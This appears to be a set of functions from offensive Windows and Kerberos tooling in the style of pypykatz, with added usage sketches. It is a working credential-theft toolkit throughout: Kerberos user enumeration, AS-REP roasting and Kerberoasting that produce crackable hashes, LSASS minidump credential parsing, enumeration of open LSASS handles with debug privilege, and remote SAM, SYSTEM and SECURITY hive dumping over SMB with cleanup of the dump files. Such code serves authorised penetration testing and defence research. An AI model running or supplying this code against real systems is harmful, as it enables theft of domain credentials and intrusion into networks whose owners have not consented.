async def brute(host, targets, out_file=None, show_negatives=False):
	"""
	targets List<KerberosSPN>
	"""
	try:
		logger.debug('[KERBEROS][BRUTE] User enumeration starting')
		target = KerberosTarget(host)

		for spn in targets:
			ke = KerberosUserEnum(target, spn)
			result = await ke.run()
			if result is True:
				if out_file:
					with open(out_file, 'a') as f:
						f.write(str(spn) + '\r\n')  # write the username, not the boolean result
				else:
					print('[+] %s' % str(spn))
			else:
				if show_negatives is True:
					print('[-] %s' % str(spn))

		logger.info('[KERBEROS][BRUTE] User enumeration finished')
		return None, None
	except Exception as e:
		return None, e
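# --- Usage sketch, not part of the original source ---
# Minimal driver for brute() above. The way KerberosSPN objects are built
# here (default construction plus setting .username/.domain) is an assumption
# based on the docstring, not a confirmed minikerberos API.
async def _example_brute():
	targets = []
	for username in ['alice', 'bob', 'svc_sql']:
		spn = KerberosSPN()        # assumed: default-constructible
		spn.username = username    # assumed attribute names
		spn.domain = 'corp.local'
		targets.append(spn)
	_, err = await brute('10.0.0.1', targets, out_file='valid_users.txt')
	if err is not None:
		raise err
# asyncio.run(_example_brute())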
def run(self):
	self.result_process = LGResProc(self.outQ, out_file=self.out_file, to_json=self.to_json)
	self.result_process.daemon = True
	self.result_process.start()

	for i in range(self.agent_proccnt):
		p = LocalGroupEnumProc(self.inQ, self.outQ, self.agent_threadcnt, groups=self.groups, timeout=self.timeout, pre_check=self.pre_check)
		p.daemon = True
		p.start()
		self.agents.append(p)

	logger.info('=== Enumerating local groups ===')
	for t in self.hosts:
		self.inQ.put(t)

	# each agent process runs agent_threadcnt worker threads; send one None
	# sentinel per worker thread so every thread can exit cleanly
	for a in self.agents:
		for i in range(self.agent_threadcnt):
			self.inQ.put(None)

	for a in self.agents:
		a.join()

	self.outQ.put(None)
	self.result_process.join()
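# --- Illustration, not part of the original source ---
# The shutdown protocol used by run() above, in miniature: the producer puts
# one None sentinel per worker thread, so every consumer sees exactly one
# sentinel and exits; join() then returns once all workers have finished.
def _sentinel_demo(worker_count=3):
	import queue
	import threading

	q = queue.Queue()

	def worker():
		while True:
			item = q.get()
			if item is None:   # sentinel: this worker is done
				return
			print('processing', item)

	workers = [threading.Thread(target=worker) for _ in range(worker_count)]
	for w in workers:
		w.start()
	for host in ['host1', 'host2', 'host3']:
		q.put(host)
	for _ in range(worker_count):  # one sentinel per worker
		q.put(None)
	for w in workers:
		w.join()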
async def asreproast(host, targets, out_file=None, etype=23):
	"""
	targets List<KerberosSPN>
	"""
	try:
		logger.debug('[KERBEROS][ASREPROAST] Roasting...')
		logger.debug('[KERBEROS][ASREPROAST] Supporting the following encryption type: %s' % (str(etype)))
		ks = KerberosTarget(host)
		ar = APREPRoast(ks)
		hashes = []
		for target in targets:
			h = await ar.run(target, override_etype=[etype])
			hashes.append(h)

		if out_file:
			with open(out_file, 'a', newline='') as f:
				for thash in hashes:
					f.write(thash + '\r\n')
		else:
			for thash in hashes:  # print every hash, not just the last one
				print(thash)

		logger.info('[KERBEROS][ASREPROAST] Done!')
		return hashes, None
	except Exception as e:
		return None, e
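# --- Usage sketch, not part of the original source ---
# AS-REP roasting needs no credentials, only target accounts that have
# Kerberos preauthentication disabled. The targets list is built the same way
# as in the brute() example above; etype 23 requests the RC4 variant.
# hashes, err = await asreproast('10.0.0.1', targets, out_file='asrep.txt', etype=23)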
def kirbi_to_ccache(ccachefile, kirbi):
	try:
		cc = CCACHE.from_file(ccachefile)
	except FileNotFoundError:
		cc = CCACHE()

	abs_path = os.path.abspath(kirbi)
	if os.path.isdir(abs_path):
		logger.info('Parsing kirbi files in directory %s' % abs_path)
		# join with the directory path so a missing trailing separator
		# doesn't break the glob pattern
		for kirbifile in glob.glob(os.path.join(abs_path, '*.kirbi')):
			cc.add_kirbi(kirbifile)
	else:
		cc.add_kirbi(kirbi)

	cc.to_file(ccachefile)
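# --- Usage sketch, not part of the original source ---
# Merging tickets into a ccache; paths are placeholders. Passing a directory
# pulls in every .kirbi file found there, a file path adds just that ticket.
# kirbi_to_ccache('/tmp/merged.ccache', '/tmp/tickets/')    # whole directory
# kirbi_to_ccache('/tmp/merged.ccache', '/tmp/admin.kirbi') # single file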
def parse_minidump_file(filename, rdp_module, chunksize=10*1024):
	try:
		minidump = MinidumpFile.parse(filename)
		reader = minidump.get_reader().get_buffered_reader(segment_chunk_size=chunksize)
		sysinfo = KatzSystemInfo.from_minidump(minidump)
	except Exception as e:
		logger.exception('Minidump parsing error!')
		raise e

	try:
		mimi = RDPCredParser(None, reader, sysinfo, rdp_module)
		mimi.start()
	except Exception as e:
		logger.exception('Credentials parsing error!')
		raise e

	return [mimi]
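# --- Usage sketch, not part of the original source ---
# Parsing an LSASS minidump for RDP credentials. 'lsass.dmp' is a placeholder
# and rdp_module is passed through to RDPCredParser; the value it expects is
# defined elsewhere in pypykatz and not shown here.
# parsers = parse_minidump_file('lsass.dmp', rdp_module)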
def get_lsa_bruteforce(self):
	#good luck!
	logger.info('Testing all available templates! Expect warnings!')
	for lsa_dec_template in LsaTemplate.get_template_brute(self.sysinfo):
		try:
			lsa_dec = LsaDecryptor.choose(self.reader, lsa_dec_template, self.sysinfo)
			logger.debug(lsa_dec.dump())
		except Exception:
			pass
		else:
			logger.info('Lucky you! Bruteforce method found a -probably- working template!')
			return lsa_dec
def run(self):
	self.setup()
	while True:
		result = self.outQ.get()
		if not result:
			break
		target, groupname, group = result
		if self.to_json is True:
			if target not in self.results:
				self.results[target] = []
			self.results[target].append([groupname, group.to_dict()])
		else:
			result = '%s %s %s %s %s' % (target, groupname, group.domain, group.username, str(group.sid))
			if self.out_file is not None:
				if target not in self.results:
					self.results[target] = []
				self.results[target].append(result)
			else:
				print(result)

	if self.out_file is None and self.to_json is False:
		return

	logger.info('Writing results...')
	if self.out_file is not None:
		with open(self.out_file, 'w', newline='') as f:
			if self.to_json is True:
				f.write(json.dumps(self.results, cls=UniversalEncoder, indent=4, sort_keys=True))
			else:
				for target in self.results:
					for res in self.results[target]:
						f.write('%s %s\r\n' % (target, res))
	else:
		print(json.dumps(self.results, cls=UniversalEncoder, indent=4, sort_keys=True))
def del_ccache(ccachefile, index):
	output_filename = os.path.join(os.path.dirname(os.path.abspath(ccachefile)), '%s.edited.ccache' % ntpath.basename(ccachefile))
	cc = CCACHE.from_file(ccachefile)

	# rebuild the ccache by hand, copying every field and every credential
	# except the one at the given index (CCACHE offers no in-place delete)
	temp_cc = CCACHE()
	temp_cc.file_format_version = cc.file_format_version
	temp_cc.headerlen = cc.headerlen
	temp_cc.headers = cc.headers
	temp_cc.primary_principal = cc.primary_principal

	for i, cred in enumerate(cc.credentials):
		if i == index:
			continue
		temp_cc.credentials.append(cred)

	logger.info('Writing edited file to %s' % output_filename)
	temp_cc.to_file(output_filename)
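# --- Usage sketch, not part of the original source ---
# Pick the index by listing the credentials first; the .credentials list is
# the same one del_ccache() iterates above.
# cc = CCACHE.from_file('/tmp/user.ccache')
# for i, cred in enumerate(cc.credentials):
#     print(i, cred)
# del_ccache('/tmp/user.ccache', 2)  # writes user.ccache.edited.ccache next to the input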
def enum_lsass_handles():
	# searches for open LSASS process handles in all processes;
	# SE_DEBUG privilege must already be enabled at this point
	RtlAdjustPrivilege(20)

	lsass_handles = []
	sysinfohandles = NtQuerySystemInformation(16)
	for pid in sysinfohandles:
		if pid == 4:
			continue
		for syshandle in sysinfohandles[pid]:
			try:
				pHandle = OpenProcess(PROCESS_DUP_HANDLE, False, pid)
			except Exception as e:
				logger.debug('Error opening process %s Reason: %s' % (pid, e))
				continue

			try:
				dupHandle = NtDuplicateObject(pHandle, syshandle.Handle, GetCurrentProcess(), PROCESS_QUERY_INFORMATION|PROCESS_VM_READ)
			except Exception as e:
				logger.debug('Failed to duplicate object! PID: %s HANDLE: %s' % (pid, hex(syshandle.Handle)))
				continue

			oinfo = NtQueryObject(dupHandle, ObjectTypeInformation)
			if oinfo.Name.getString() == 'Process':
				try:
					pname = QueryFullProcessImageNameW(dupHandle)
					if pname.lower().find('lsass.exe') != -1:
						logger.info('Found open handle to lsass! PID: %s HANDLE: %s' % (pid, hex(syshandle.Handle)))
						lsass_handles.append((pid, dupHandle))
				except Exception as e:
					logger.debug('Failed to obtain the path of the process! PID: %s' % pid)
					continue

	return lsass_handles
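# --- Usage sketch, not part of the original source ---
# Windows-only and privileged: RtlAdjustPrivilege(20) above enables
# SeDebugPrivilege, so the calling process must be allowed to acquire it.
# Each returned handle was duplicated with PROCESS_QUERY_INFORMATION and
# PROCESS_VM_READ access.
# for pid, handle in enum_lsass_handles():
#     print('PID %s holds an open LSASS handle: %s' % (pid, handle))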
def run(self, args):
	files_with_error = []
	results = {}

	###### Rekall
	if args.cmd == 'rekall':
		if args.kerberos_dir is not None and 'all' not in args.packages:
			args.packages.append('ktickets')
		mimi = pypykatz.parse_memory_dump_rekall(args.memoryfile, args.timestamp_override, packages=args.packages)
		results['rekall'] = mimi

	###### Minidump
	elif args.cmd == 'minidump':
		if args.directory:
			dir_fullpath = os.path.abspath(args.memoryfile)
			file_pattern = '*.dmp'
			if args.recursive is True:
				globdata = os.path.join(dir_fullpath, '**', file_pattern)
			else:
				globdata = os.path.join(dir_fullpath, file_pattern)

			logger.info('Parsing folder %s' % dir_fullpath)
			for filename in glob.glob(globdata, recursive=args.recursive):
				logger.info('Parsing file %s' % filename)
				try:
					if args.kerberos_dir is not None and 'all' not in args.packages:
						args.packages.append('ktickets')
					mimi = pypykatz.parse_minidump_file(filename, packages=args.packages)
					results[filename] = mimi
					if args.halt_on_error is True and len(mimi.errors) > 0:
						raise Exception('Error in modules!')
				except Exception as e:
					files_with_error.append(filename)
					logger.exception('Error parsing file %s ' % filename)
					if args.halt_on_error is True:
						raise e
		else:
			logger.info('Parsing file %s' % args.memoryfile)
			try:
				if args.kerberos_dir is not None and 'all' not in args.packages:
					args.packages.append('ktickets')
				mimi = pypykatz.parse_minidump_file(args.memoryfile, packages=args.packages)
				results[args.memoryfile] = mimi
				if args.halt_on_error is True and len(mimi.errors) > 0:
					raise Exception('Error in modules!')
			except Exception as e:
				logger.exception('Error while parsing file %s' % args.memoryfile)
				if args.halt_on_error is True:
					raise e
				else:
					traceback.print_exc()

	self.process_results(results, files_with_error, args)
async def spnroast(url, targets, out_file=None, etype=23):
	"""
	targets List<KerberosSPN>
	"""
	try:
		logger.debug('[KERBEROS][SPNROAST] Roasting...')
		if etype:
			if etype == -1:
				etypes = [23, 17, 18]
			else:
				etypes = [etype]
		else:
			etypes = [23, 17, 18]

		logger.debug('[KERBEROS][SPNROAST] Using the following encryption type(s): %s' % (','.join(str(x) for x in etypes)))

		ku = KerberosClientURL.from_url(url)
		cred = ku.get_creds()
		target = ku.get_target()

		ar = Kerberoast(target, cred)
		hashes = await ar.run(targets, override_etype=etypes)

		if out_file:
			with open(out_file, 'w', newline='') as f:
				for thash in hashes:
					f.write(thash + '\r\n')
		else:
			for thash in hashes:
				print(thash)

		logger.info('[KERBEROS][SPNROAST] Done!')
		return hashes, None
	except Exception as e:
		return None, e
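# --- Usage sketch, not part of the original source ---
# spnroast() authenticates from a kerberos client URL (parsed by
# KerberosClientURL above). The URL below is a made-up example of that
# scheme, and the KerberosSPN construction is the same assumption as in the
# brute() example; etype=-1 tries 23, 17 and 18.
async def _example_spnroast():
	spn = KerberosSPN()          # assumed construction, see brute() example
	spn.username = 'svc_sql'     # assumed attribute names
	spn.domain = 'corp.local'
	url = 'kerberos+password://CORP\\lowpriv:Passw0rd@10.0.0.1'  # example URL
	hashes, err = await spnroast(url, [spn], out_file='roasted.txt', etype=-1)
	if err is not None:
		raise err
# asyncio.run(_example_spnroast())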
async def run(self, args):
	files_with_error = []
	results = {}

	###### Minidump
	if args.cmd == 'minidump':
		if args.directory:
			dir_fullpath = os.path.abspath(args.memoryfile)
			file_pattern = '*.dmp'
			if args.recursive is True:
				globdata = os.path.join(dir_fullpath, '**', file_pattern)
			else:
				globdata = os.path.join(dir_fullpath, file_pattern)

			logger.info('Parsing folder %s' % dir_fullpath)
			for filename in glob.glob(globdata, recursive=args.recursive):
				logger.info('Parsing file %s' % filename)
				try:
					mimi = await apypykatz.parse_minidump_file(filename, packages=args.packages)
					results[filename] = mimi
				except Exception as e:
					files_with_error.append(filename)
					logger.exception('Error parsing file %s ' % filename)
					if args.halt_on_error is True:
						raise e
		else:
			logger.info('Parsing file %s' % args.memoryfile)
			try:
				mimi = await apypykatz.parse_minidump_file(args.memoryfile, packages=args.packages)
				results[args.memoryfile] = mimi
			except Exception as e:
				logger.exception('Error while parsing file %s' % args.memoryfile)
				if args.halt_on_error is True:
					raise e
				else:
					traceback.print_exc()

	self.process_results(results, files_with_error, args)
def log_basic_info(self):
	"""
	In case of error, please attach this to the issues page
	"""
	logger.info('===== BASIC INFO. SUBMIT THIS IF THERE IS AN ISSUE =====')
	logger.info('pypyKatz version: %s' % __version__)
	logger.info('CPU arch: %s' % self.sysinfo.architecture.name)
	logger.info('OS: %s' % self.sysinfo.operating_system)
	logger.info('BuildNumber: %s' % self.sysinfo.buildnumber)
	logger.info('MajorVersion: %s' % self.sysinfo.major_version)
	logger.info('MSV timestamp: %s' % self.sysinfo.msv_dll_timestamp)
	logger.info('===== BASIC INFO END =====')
def process_results(self, results, files_with_error, args):
	if args.outfile and args.json:
		with open(args.outfile, 'w') as f:
			json.dump(results, f, cls=UniversalEncoder, indent=4, sort_keys=True)

	elif args.outfile and args.grep:
		with open(args.outfile, 'w', newline='') as f:
			f.write(':'.join(LogonSession.grep_header) + '\r\n')
			for result in results:
				for luid in results[result].logon_sessions:
					for row in results[result].logon_sessions[luid].to_grep_rows():
						f.write(':'.join(row) + '\r\n')

	elif args.outfile:
		with open(args.outfile, 'w') as f:
			for result in results:
				f.write('FILE: ======== %s =======\n' % result)
				for luid in results[result].logon_sessions:
					f.write('\n' + str(results[result].logon_sessions[luid]))

				if len(results[result].orphaned_creds) > 0:
					f.write('\n== Orphaned credentials ==\n')
					for cred in results[result].orphaned_creds:
						f.write(str(cred))

			if len(files_with_error) > 0:
				f.write('\n== Failed to parse these files:\n')
				for filename in files_with_error:
					f.write('%s\n' % filename)

	elif args.json:
		print(json.dumps(results, cls=UniversalEncoder, indent=4, sort_keys=True))

	elif args.grep:
		if hasattr(args, 'directory') and args.directory is not None:
			print(':'.join(['filename'] + LogonSession.grep_header))
		else:
			print(':'.join(LogonSession.grep_header))

		for result in results:
			for luid in results[result].logon_sessions:
				for row in results[result].logon_sessions[luid].to_grep_rows():
					if hasattr(args, 'directory') and args.directory is not None:
						row = [result] + row
					print(':'.join(row))

			for cred in results[result].orphaned_creds:
				t = cred.to_dict()
				if t['credtype'] != 'dpapi':
					if t['password'] is not None:
						x = [str(t['credtype']), str(t['domainname']), str(t['username']), '', '', '', '', '', str(t['password'])]
						if hasattr(args, 'directory') and args.directory is not None:
							x = [result] + x
						print(':'.join(x))
				else:
					t = cred.to_dict()
					x = [str(t['credtype']), '', '', '', '', '', str(t['masterkey']), str(t['sha1_masterkey']), str(t['key_guid']), '']
					if hasattr(args, 'directory') and args.directory is not None:
						x = [result] + x
					print(':'.join(x))

			for pkg, err in results[result].errors:
				err_str = str(err) + '\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
				err_str = base64.b64encode(err_str.encode()).decode()
				x = [pkg + '_exception_please_report', '', '', '', '', '', '', '', '', err_str]
				if hasattr(args, 'directory') and args.directory is not None:
					x = [result] + x
				print(':'.join(x) + '\r\n')

	else:
		for result in results:
			print('FILE: ======== %s =======' % result)
			if isinstance(results[result], str):
				print(results[result])
			else:
				for luid in results[result].logon_sessions:
					print(str(results[result].logon_sessions[luid]))

				if len(results[result].orphaned_creds) > 0:
					print('== Orphaned credentials ==')
					for cred in results[result].orphaned_creds:
						print(str(cred))

				if len(results[result].errors) > 0:
					print('== Errors ==')
					for pkg, err in results[result].errors:
						err_str = str(err) + '\r\n' + '\r\n'.join(traceback.format_tb(err.__traceback__))
						logger.debug(err_str)
						err_str = base64.b64encode(err_str.encode()).decode()
						print('%s %s' % (pkg + '_exception_please_report', err_str))

		if len(files_with_error) > 0:
			print('\n==== Parsing errors:')
			for filename in files_with_error:
				print(filename)

	if args.kerberos_dir:
		directory = os.path.abspath(args.kerberos_dir)  # renamed from 'dir' to avoid shadowing the builtin
		logger.info('Writing kerberos tickets to %s' % directory)
		for filename in results:
			base_filename = ntpath.basename(filename)
			ccache_filename = '%s_%s.ccache' % (base_filename, os.urandom(4).hex()) #to avoid collisions
			results[filename].kerberos_ccache.to_file(os.path.join(directory, ccache_filename))

			for luid in results[filename].logon_sessions:
				for kcred in results[filename].logon_sessions[luid].kerberos_creds:
					for ticket in kcred.tickets:
						ticket.to_kirbi(directory)

			for cred in results[filename].orphaned_creds:
				if cred.credtype == 'kerberos':
					for ticket in cred.tickets:
						ticket.to_kirbi(directory)
async def regdump_single(targetid, connection, hives=['HKLM\\SAM', 'HKLM\\SYSTEM', 'HKLM\\SECURITY'], remote_base_path='C:\\Windows\\Temp\\', remote_share_name='\\c$\\Windows\\Temp\\', enable_wait=3):
	try:
		from aiosmb.commons.interfaces.machine import SMBMachine
		from aiosmb.commons.interfaces.file import SMBFile
		from aiosmb.dcerpc.v5.common.service import SMBServiceStatus
		from pypykatz.alsadecryptor.asbmfile import SMBFileReader
		from pypykatz.registry.aoffline_parser import OffineRegistry

		if remote_base_path.endswith('\\') is False:
			remote_base_path += '\\'

		if remote_share_name.endswith('\\') is False:
			remote_share_name += '\\'

		po = None
		async with connection:
			logger.debug('[REGDUMP] Connecting to server...')
			_, err = await connection.login()
			if err is not None:
				raise err

			logger.debug('[REGDUMP] Connected to server!')
			async with SMBMachine(connection) as machine:
				logger.debug('[REGDUMP] Checking remote registry service status...')
				status, err = await machine.check_service_status('RemoteRegistry')
				if err is not None:
					raise err

				logger.debug('[REGDUMP] Remote registry service status: %s' % status.name)
				if status != SMBServiceStatus.RUNNING:
					logger.debug('[REGDUMP] Enabling Remote registry service')
					_, err = await machine.enable_service('RemoteRegistry')
					if err is not None:
						raise err

					logger.debug('[REGDUMP] Starting Remote registry service')
					_, err = await machine.start_service('RemoteRegistry')
					if err is not None:
						raise err

					await asyncio.sleep(enable_wait)
					logger.debug('[REGDUMP] Remote registry service should be running now...')

				files = {}
				for hive in hives:
					fname = '%s.%s' % (os.urandom(4).hex(), os.urandom(3).hex())
					remote_path = remote_base_path + fname
					remote_sharepath = remote_share_name + fname
					remote_file = SMBFileReader(SMBFile.from_remotepath(connection, remote_sharepath))
					files[hive.split('\\')[1].upper()] = remote_file

					logger.info('[REGDUMP] Dumping reghive %s to (remote) %s' % (hive, remote_path))
					_, err = await machine.save_registry_hive(hive, remote_path)
					if err is not None:
						raise err

				for rfilename in files:
					rfile = files[rfilename]
					logger.debug('[REGDUMP] Opening reghive file %s' % rfilename)
					_, err = await rfile.open(connection)
					if err is not None:
						raise err

				try:
					logger.debug('[REGDUMP] Parsing hives...')
					po = await OffineRegistry.from_async_reader(files['SYSTEM'], sam_reader=files.get('SAM'), security_reader=files.get('SECURITY'), software_reader=files.get('SOFTWARE'))
					logger.debug('[REGDUMP] Hives parsed OK!')  # only log success when parsing actually succeeded
				except Exception as e:
					logger.exception('[REGDUMP] Failed to parse hives!')

				logger.debug('[REGDUMP] Deleting remote files...')
				err = None
				for rfilename in files:
					rfile = files[rfilename]
					err = await rfile.close()
					if err is not None:
						logger.info('[REGDUMP] ERR! Failed to close hive dump file! %s' % rfilename)

					_, err = await rfile.delete()
					if err is not None:
						logger.info('[REGDUMP] ERR! Failed to delete hive dump file! %s' % rfilename)

				if err is None:
					logger.info('[REGDUMP] Deleting remote files OK!')

		return targetid, po, None
	except Exception as e:
		return targetid, None, e
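# --- Usage sketch, not part of the original source ---
# regdump_single() expects an aiosmb connection object that has not been
# logged in yet (it calls connection.login() itself); constructing that
# connection is aiosmb-specific and omitted here.
async def _example_regdump(connection):
	targetid, po, err = await regdump_single('dc01', connection)
	if err is not None:
		raise err
	if po is not None:
		print(po)  # the parsed OffineRegistry object holds the dumped hives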
def run(self):
	self.setup()
	while True:
		result = self.outQ.get()
		if not result:
			break
		target, share, err = result
		if err is not None:
			if self.to_json is False and self.out_file is None:
				print('%s : %s' % (target, str(err)))
			else:
				self.errors[target] = err
			continue

		if self.to_json is True:
			if target not in self.results:
				self.results[target] = []
			self.results[target].append(share.to_dict())
		else:
			result = '%s %s %s %s %s' % (target, share.netname, share.type, share.remark, share.passwd)
			if self.out_file is not None:
				if target not in self.results:
					self.results[target] = []
				self.results[target].append(result)
			else:
				print(result)

	if self.out_file is None and self.to_json is False:
		#results were already printed as they arrived
		return

	logger.info('Writing results...')
	if self.out_file is not None:
		with open(self.out_file, 'w', newline='') as f:
			if self.to_json is True:
				f.write(json.dumps({'results': self.results, 'errors': self.errors}, cls=UniversalEncoder, indent=4, sort_keys=True))
			else:
				for target in self.results:
					for res in self.results[target]:
						f.write('%s %s\r\n' % (target, res))
				for target in self.errors:
					f.write('%s %s\r\n' % (target, self.errors[target]))
	else:
		print(json.dumps({'results': self.results, 'errors': self.errors}, cls=UniversalEncoder, indent=4, sort_keys=True))
def ccache_to_kirbi(ccachefile, kirbidir):
	cc = CCACHE.from_file(ccachefile)
	logger.info('Extracting kirbi file(s)')
	cc.to_kirbidir(kirbidir)
	logger.info('Done!')
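# --- Usage sketch, not part of the original source ---
# The inverse of kirbi_to_ccache() above: writes one .kirbi file per
# credential in the ccache into the given directory. Paths are placeholders.
# ccache_to_kirbi('/tmp/merged.ccache', '/tmp/kirbis/')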